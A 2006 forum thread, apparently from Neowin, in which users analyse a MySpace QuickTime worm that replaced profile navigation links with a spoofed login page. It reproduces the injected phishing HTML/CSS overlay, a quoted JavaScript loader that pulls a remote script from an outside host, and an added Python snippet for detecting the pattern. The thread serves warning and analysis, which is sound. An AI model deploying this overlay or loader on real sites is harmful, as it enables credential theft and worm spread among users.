kaneso, posted November 29, 2006 (edited):
Anyone use myspace? Just tonight on a bunch of profiles I see this quicktime .mov file appearing everywhere. Well, it automatically plays, and as soon as I view my homepage it has appeared on mine. Anyways, what it basically does is change all the links on the myspace layouts to link to http://almobty.com/css/login.html which is obviously a spoofed myspace login page, and MANY people will fall for this. This is obviously trying to steal passwords and isn't just a proof of concept like some past myspace exploits. You can easily get rid of this by removing the code in your movies section and removing the junk code in the about me section which changes the links. I'm not a coder but here is the code (maybe someone could examine it?):
About Me:
<style type="text/css">
div table td font { display: none }
div div table tr td a.navbar, div div table tr td font { display: none }
.testnav { position:absolute; top: 136px; left:50%; _top: 146px }
</style>
<div style="z-index:5; background-color: #6698CB; margin-left:-400px; width: 800px" align="center" class="testnav"><div style="">
<a href="http://almobty.com/css/login.html" target="" class="navbar">Home</a> |
<a href="http://almobty.com/css/login.html" target="" class="navbar">Browse</a> |
<a href="http://almobty.com/css/login.html" target="" class="navbar">Search</a> |
<a href="http://almobty.com/css/login.html" target="" class="navbar">Invite</a> |
<a href="http://almobty.com/css/login.html" target="" class="navbar">Film</a> |
<a href="http://almobty.com/css/login.html" target="" class="navbar">Mail</a> |
<a href="http://almobty.com/css/login.html" target="" class="navbar">Blog</a> |
<a href="http://almobty.com/css/login.html" target="" class="navbar">Favorites</a> |
<a href="http://almobty.com/css/login.html" target="" class="navbar">Forum</a> |
<a href="http://almobty.com/css/login.html" target="" class="navbar">Groups</a> |
<a href="http://almobty.com/css/login.html" target="" class="navbar">Events</a> |
<a href="http://almobty.com/css/login.html" target="" class="navbar">Videos</a> |
<a href="http://almobty.com/css/login.html" target="" class="navbar">Music</a> |
<a href="http://almobty.com/css/login.html" target="" class="navbar">Comedy</a> |
<a href="http://almobty.com/css/login.html" target="" class="navbar">Classifieds</a>
</div></div>
Movies:
<div style="width: 1px; height: 1px; overflow: hidden; text-indent: -9999px"><embed allowScriptAccess="never" allowNetworking="internal" enableJSURL="false" src=http://almobty.com/css/piAF2iuswo.mov /></div>
The problem is as soon as you visit another profile with it, it comes back, and it's spreading like wildfire, so maybe remove it and keep a low profile for the time being?
http://almobty.com appears to be a foreign website for contracting.
I'm running Firefox 2 (so it doesn't only affect IE).
Here is an example:
Edited November 30, 2006 by kaneso
Link to comment: https://www.neowin.net/forum/topic/517166-urgent-new-myspace-exploit/
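Added example, not part of the original thread and not code from any poster: a Python sketch of how a site operator or moderator could flag the pattern in the snippet above (a stylesheet rule hiding the real menu, `navbar`-class links pointing off-site, and an off-site embed tucked inside a 1px container). The trusted-domain list, the finding labels and the `phish.example` sample are assumptions made for illustration.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

TRUSTED = ("myspace.com",)  # assumption: domains the site's own menu links to
HIDE = re.compile(r"(?<![\w-])(?:width|height)\s*:\s*[01]px|text-indent\s*:\s*-\d{3,}px"
                  r"|display\s*:\s*none", re.I)  # inline styles that conceal an element
CSS_HIDES_NAV = re.compile(r"a\.navbar[^{]*\{[^}]*display\s*:\s*none", re.I)
VOID = {"embed", "img", "br", "hr", "input", "param", "meta", "link"}

def off_site(url):
    host = (urlparse(url).hostname or "").lower()  # relative URLs have no host
    return bool(host) and not any(host == d or host.endswith("." + d) for d in TRUSTED)

class ProfileScanner(HTMLParser):
    def __init__(self):
        super().__init__()
        self.findings, self.hidden = [], []  # hidden: one flag per open element

    def handle_starttag(self, tag, attrs):
        a = {k: v or "" for k, v in attrs}
        concealed = bool(HIDE.search(a.get("style", "")))
        # Menu-styled link that leaves the site: the overlay described in the post.
        if tag == "a" and "navbar" in a.get("class", "").split() and off_site(a.get("href", "")):
            self.findings.append(("fake-nav-link", a["href"]))
        src = a.get("src") or a.get("data", "")
        if tag in ("embed", "object") and off_site(src):
            kind = "hidden-embed" if concealed or any(self.hidden) else "offsite-embed"
            self.findings.append((kind, src))
        if tag not in VOID:
            self.hidden.append(concealed)

    def handle_endtag(self, tag):
        if tag not in VOID and self.hidden:
            self.hidden.pop()

def scan_profile(html):
    scanner = ProfileScanner()
    scanner.feed(html)
    scanner.close()
    css = [("nav-hidden-by-css", "a.navbar")] if CSS_HIDES_NAV.search(html) else []
    return css + scanner.findings  # stylesheet rule is matched on the raw text

# Constructed sample modelled on the posted snippet; phish.example is a placeholder.
SAMPLE = """<style>div div table tr td a.navbar { display: none }</style>
<div class="testnav"><a href="http://phish.example/css/login.html" class="navbar">Home</a></div>
<div style="width: 1px; height: 1px; overflow: hidden; text-indent: -9999px">
<embed src="http://phish.example/css/clip.mov" /></div>
<a href="http://home.myspace.com/" class="navbar">Home</a>"""
```

`scan_profile(SAMPLE)` returns three findings (the CSS rule, the off-site menu link and the hidden embed) and ignores the last link, which stays on a trusted domain.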
nvme, posted November 29, 2006:
heh.. nice. probably wouldn't hurt to send the myspace people an email and let them know, if they don't already.
Rappy (Veteran), posted November 29, 2006:
There's a lot of this crap around lately to do with Myspace...that's why I have stayed away from them and been using Facebook...my mate's myspace got accessed like that and he had all his friends deleted and messages sent to people saying obscene things...:(
tomwarren (Veteran), posted November 29, 2006:
Cool posted - thanks
micro, posted November 29, 2006:
I been off myspace for 5 months now, was sick of all the crap and slow server speed.
XPGoD, posted November 30, 2006:
Looking at the code, it is meant to redo the entire thing... basically redo your entire profile. But there is code in it that does nothing. I think someone modified a hack from the past, and it's gotten out of control. That imageshack photo is kinda odd... eh?
Syntex, posted November 30, 2006:
It is a redirect exploit seemingly enough, the mov is used as a means of spreading, it adds the css code into your profile and uses it to phish you. That's all, and as far as the site it is being hosted on, odds are it is a hacked server. What I would be worried about is if someone takes the spread code and uses it for something else. Think about it, if they are able to get the code to edit your profile with a mov file, just what else could be done with this?
batbeef, posted November 30, 2006:
thanks for the heads up
d_fens, posted November 30, 2006:
http://www.cake.fi/images/login.html is where http://almobty.com/css/login.html redirects to. More than likely it was some script kiddie. The cake.fi server seems to be down though. It seemed to be a cafe shop or something but the DNS server has changed.
n_K, posted November 30, 2006 (edited):
heh, all movies from myspace are down. myspace is crap anyway, why do people still use it?
also, http://almobty.com DNS info:
Name Servers:
NS1.ALL-SOLUTION.NET
NS2.ALL-SOLUTION.NET
Technical Contact:
Almobty Co.
Al-Mobty Company for contracting (webmaster@deltawww.net)
+966.4658695
Fax: +966.4659242
Olaya Street, POBox 7705 Riyadh 11472, Tel. 966-1-4658695 & Fax. 4659242
RIYADH, 11472
SA
Damn, that's a good hacker :)
part source of QT file:
<java script:void((function(){var e=window.document.createElement('script');e.setAttribute('src','http://www.cake.fi/images/js.js');window.document.body.appendChild(e);})());> T<>?orig...
Edited November 30, 2006 by n_K
l0g0ut, posted November 30, 2006:
open 'host' file.... add entry 127.0.0.1 www.myspace.com
»X«, posted November 30, 2006:
> There's a lot of this crap around lately to do with Myspace...that's why I have stayed away from them and been using Facebook...my mate's myspace got accessed like that and he had all his friends deleted and messages sent to people saying obscene things...:(
lol
superzz, posted November 30, 2006:
> heh, all movies from myspace are down. myspace is crap anyway, why do people still use it?
> also, http://almobty.com DNS info:
> Name Servers:
> NS1.ALL-SOLUTION.NET
> NS2.ALL-SOLUTION.NET
> Technical Contact:
> Almobty Co.
> Al-Mobty Company for contracting (webmaster@deltawww.net)
> +966.4658695
> Fax: +966.4659242
> Olaya Street, POBox 7705 Riyadh 11472, Tel. 966-1-4658695 & Fax. 4659242
> RIYADH, 11472
> SA
> Damn, that's a good hacker :)
> part source of QT file:
> <java script:void((function(){var e=window.document.createElement('script');e.setAttribute('src','http://www.cake.fi/images/js.js');window.document.body.appendChild(e);})());> T<>?orig...
If you use a text editor you can change the location of the script that it looks for and create your own custom script for your myspace page. I have downloaded the js.js and looked at the code; it just seems to try to write over your formatting and then it spams every 6 sec. to random id.
Des429, posted November 30, 2006:
ITS THE RING!!11!!11
n_K, posted December 1, 2006:
> If you use a text editor you can change the location of the script that it looks for and create your own custom script for your myspace page. I have downloaded the js.js and looked at the code; it just seems to try to write over your formatting and then it spams every 6 sec. to random id.
yeh, but it writes the javascript through the quicktime file, so open the quicktime .mov in notepad, look at the binary followed by "apple text writer plugin"
lerum, posted December 1, 2006:
lol looks like cake.fi felt the extra traffic and died :p
rusonjitsu, posted December 2, 2006:
just add http://almobty.com to your hosts file ;)
+John Teacake (MVC), posted December 2, 2006 (edited):
I got this. Does the user's PC become infected with anything? When I view my profile and click home I get redirected to http://www.../images/login.html, which doesn't go anywhere obviously. Has this thing installed anything on my PC?
Edited December 2, 2006 by Sawyer12
lerum, posted December 2, 2006:
It looks like myspace have obviously removed that link from the site. I doubt it's installed any spyware and such on your computer, it looks like it's just a scam site.
Inplode, posted December 2, 2006:
myspace = crap !
Popcorned1, posted December 2, 2006:
You guys are so biased, we get paypal scams all the time, but you don't run around saying how crap that is. MySpace has a few in the news and you start slagging off MySpace within seconds. MySpace may be crap, but hell. It's great crap.
+John Teacake (MVC), posted December 3, 2006:
What's going on with Myspace? The new one directs to http://www.daviddraftsystem.com/images/login.html :no: :unsure: :wacko: :|
+John Teacake (MVC), posted December 4, 2006:
Are there any clear cut tutorials on how to get rid of this?
jerzdawg, posted December 4, 2006:
> Are there any clear cut tutorials on how to get rid of this?
you have to clean up all of the sections on your page....
sdfhuigtreb, posted January 11, 2007:
This has actually been around for a while. I took note of it back in October and thought nothing of it. I even warned people about this .mov exploit and nobody really listened. I guess I should have posted something here, eh? :laugh: This has happened to me twice now, and yes, I know how to get rid of it. But I'm tired of the insecure status of Myspace, and therefore have deleted my account. I'm glad someone made this public, as it should be addressed to both Myspace and the people who use it. Everyone who has contributed to this thread thus far has explained the majority of this exploit. There are several sources of the .mov and I don't think this will be fixed for a while. I suggest that you leave Myspace as soon as possible, people. I'm actually glad this happened to me more than once; now I won't be wasting any MORE time. :laugh: It's only going to get worse from here on, and we can't really do anything about it. Ah well. I guess that's how it goes... :p